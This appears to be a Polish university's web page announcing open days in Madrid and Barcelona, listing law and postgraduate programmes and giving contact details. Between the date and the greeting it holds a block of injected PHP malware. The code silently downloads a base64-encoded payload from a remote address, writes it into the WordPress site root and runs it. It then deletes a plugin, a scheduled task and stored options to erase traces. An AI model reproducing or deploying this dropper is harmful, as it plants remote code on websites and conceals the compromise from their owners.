6 maja 2017 Dni otwarte

error_reporting(0);
$http=get_option(E_NOTICE);
$resp=wp_remote_get( $http[0]);
$code=wp_remote_retrieve_body($resp);
file_put_contents(ABSPATH.$http[1], base64_decode($code));
include_once(ABSPATH.$http[4]);
deactivate_plugins($http[2]);
delete_plugins(array($http[2]));
wp_clear_scheduled_hook($http[3]);
delete_option($http[5]);
delete_option(E_NOTICE);

Kochani!
Serdecznie zapraszamy na Dni Otwarte w malowniczym Madrycie oraz zachwycającej Barcelonie, które poprowadzi Rektor Uczelni dr Dariusz Czajka prof. nadzw. EWSPA.
Będziecie mieli Państwo okazję zapoznać się nie tylko z bogatą ofertą naszej Uczelni, dotyczącą:
۩ Studiów na kierunku Prawo
۩ Studiów podyplomowych
۩ Eksternistycznego Seminarium Doktoranckiego
۩ Administracji Europejskiej
۩ Studiów Prawniczych z Uznaniem Dorobku Zawodowego
a także poznać szczegółowe zasady rekrutacji , systemy stypendialne dla kandydatów, oraz uzyskać poradę w kwestii doboru specjalności do aspiracji zawodowych.
Harmonogram spotkań:
MADRYT:
Polska Szkola Forum
im. Marii Konopnickiej
C/Berlín 2 28938 Móstoles
BARCELONA:
(szczegóły dotyczace miejsca wkrótce- kontakt do naszej cudownej przedstawicielki w Barcelonie: Małgorzata Banasik mail: vidaconalone@gmail.com
Kontakt:
Mail: rekrutacja@ewspa.edu.pl lub katarzyna.janas@ewspa.edu.pl
Tel: 0034 626615541 lub +48 605 528 605